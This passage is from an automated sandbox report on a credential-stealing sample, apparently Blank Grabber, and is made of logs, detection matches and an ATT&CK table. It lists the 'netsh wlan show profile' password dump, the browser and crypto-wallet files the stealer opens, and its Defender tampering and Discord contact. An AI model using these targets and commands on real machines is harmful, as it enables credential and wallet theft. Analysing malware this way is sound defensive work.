              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29BD080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6A29BD080
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29D5C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6A29D5C70
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542848CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,77_2_00007FF7542848CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000000.00000003.2060159493.000001C6D7275000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2060159493.000001C6D7273000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2435665528.000001C0EE2E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2434059105.000001C0EEF45000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2440748716.000001C0EE2E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: driver.exe PID: 5708, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: driver.exe PID: 6620, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI57082\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: driver.exe PID: 6620, type: MEMORYSTR
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fJaxx
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE7C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE7C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: driver.exe, 00000002.00000002.2442424891.000001C0EE7C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.defaultJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\driver.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: driver.exe PID: 6620, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000000.00000003.2060159493.000001C6D7275000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2060159493.000001C6D7273000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2435665528.000001C0EE2E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2434059105.000001C0EEF45000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2440748716.000001C0EE2E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: driver.exe PID: 5708, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: driver.exe PID: 6620, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI57082\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: driver.exe PID: 6620, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              4
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              3
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts2
              Native API
              2
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              11
              Deobfuscate/Decode Files or Information
              LSASS Memory2
              File and Directory Discovery
              Remote Desktop Protocol3
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts122
              Command and Scripting Interpreter
              Logon Script (Windows)11
              Process Injection
              21
              Obfuscated Files or Information
              Security Account Manager59
              System Information Discovery
              SMB/Windows Admin Shares1
              Email Collection
              4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              Login Hook2
              Registry Run Keys / Startup Folder
              11
              Software Packing
              NTDS161
              Security Software Discovery
              Distributed Component Object Model1
              Clipboard Data
              5
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp
              LSA Secrets2
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials151
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              File Deletion
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Masquerading
              Proc Filesystem11
              Remote System Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
              Virtualization/Sandbox Evasion
              /etc/passwd and /etc/shadow11
              System Network Configuration Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Access Token Manipulation
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
              Process Injection
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587410 Sample: driver.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 70 ip-api.com 2->70 72 discord.com 2->72 80 Sigma detected: Capture Wi-Fi password 2->80 82 Multi AV Scanner detection for submitted file 2->82 84 Yara detected Blank Grabber 2->84 86 10 other signatures 2->86 11 driver.exe 61 2->11         started        15 svchost.exe 2->15         started        signatures3 process4 dnsIp5 62 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->62 dropped 64 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->64 dropped 66 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->66 dropped 68 55 other files (none is malicious) 11->68 dropped 112 Self deletion via cmd or bat file 11->112 114 Modifies Windows Defender protection settings 11->114 116 Adds a directory exclusion to Windows Defender 11->116 118 2 other signatures 11->118 18 driver.exe 1 90 11->18         started        78 127.0.0.1 unknown unknown 15->78 file6 signatures7 process8 dnsIp9 74 ip-api.com 208.95.112.1, 49841, 80 TUT-ASUS United States 18->74 76 discord.com 162.159.137.232, 443, 49845 CLOUDFLARENETUS United States 18->76 88 Found many strings related to Crypto-Wallets (likely being stolen) 18->88 90 Self deletion via cmd or bat file 18->90 92 Tries to harvest and steal browser information (history, passwords, etc) 18->92 94 6 other signatures 18->94 22 cmd.exe 1 18->22         started        25 cmd.exe 1 18->25         started        27 cmd.exe 1 18->27         started        29 28 other processes 18->29 signatures10 process11 signatures12 96 Suspicious powershell command line found 22->96 98 Uses ping.exe to sleep 22->98 100 Encrypted powershell cmdline option found 22->100 110 4 other signatures 22->110 31 powershell.exe 23 22->31         started        34 conhost.exe 22->34         started        102 Modifies Windows Defender protection settings 25->102 104 Removes signatures from Windows Defender 25->104 36 powershell.exe 23 25->36         started        46 2 other processes 25->46 106 Adds a directory exclusion to Windows Defender 27->106 38 powershell.exe 27->38         started        40 conhost.exe 27->40         started        108 Tries to harvest and steal WLAN passwords 29->108 42 getmac.exe 29->42         started        44 systeminfo.exe 29->44         started        48 52 other processes 29->48 process13 file14 120 Loading BitLocker PowerShell Module 36->120 122 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 42->122 124 Writes or reads registry keys via WMI 42->124 56 C:\Users\user\AppData\...\c4gv4hox.cmdline, Unicode 48->56 dropped 58 C:\Users\user\AppData\Local\Temp\Ffb7z.zip, RAR 48->58 dropped 51 csc.exe 48->51         started        signatures15 process16 file17 60 C:\Users\user\AppData\Local\...\c4gv4hox.dll, PE32 51->60 dropped 54 cvtres.exe 51->54         started        process18

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
